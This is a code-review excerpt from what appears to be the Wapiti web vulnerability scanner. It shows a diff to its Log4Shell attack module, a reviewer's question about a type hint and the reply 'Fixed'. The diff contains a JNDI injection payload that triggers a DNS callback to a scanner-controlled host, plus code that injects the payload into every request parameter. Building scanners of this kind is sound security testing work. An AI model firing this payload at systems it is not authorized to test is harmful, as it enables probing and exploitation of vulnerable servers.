wapitiCore/attack/mod_log4shell.py

```diff
@@ -96,14 +138,42 @@ async def _get_malicious_headers(self, headers: List[str]) -> Tuple[Dict, Dict]:
 
             for header in header_batch:
                 header_uuid = uuid.uuid4()
-                malicious_header[header] = "${jndi:dns://" + f"{self.dns_endpoint}/{header_uuid}" + ".l}"
+                malicious_header[header] = self._generate_payload(header_uuid)
                 headers_uuid_record[header] = header_uuid
             batch_malicious_headers.append(malicious_header)
 
         return batch_malicious_headers, headers_uuid_record
 
+    def _inject_payload(
+        self,
+        original_request: Request,
+        params: List[Tuple[str, str]],
+    ) -> Tuple[Request, str, uuid.UUID]:
+        for idx in range(0, len(params)):
+            malicious_params = copy.deepcopy(params)
+
+            param_uuid = uuid.uuid4()
+            param_name = malicious_params[idx][0]
+
+            malicious_params[idx][1] = self._generate_payload(param_uuid)
+
+            malicious_request = Request(
+                path=original_request.url,
+                method=original_request.method,
+                post_params=malicious_params if original_request.method == "POST" else original_request.post_params,
+                get_params=malicious_params if original_request.method == "GET" else original_request.get_params,
+                referer=original_request.referer,
+                link_depth=original_request.link_depth
+            )
+            yield malicious_request, param_name, param_uuid
+
+    def _generate_payload(self, unique_id: str) -> str:
```

Comment:
`unique_id` type should be `uuid.uuid4` instead ?

Reply:
Fixed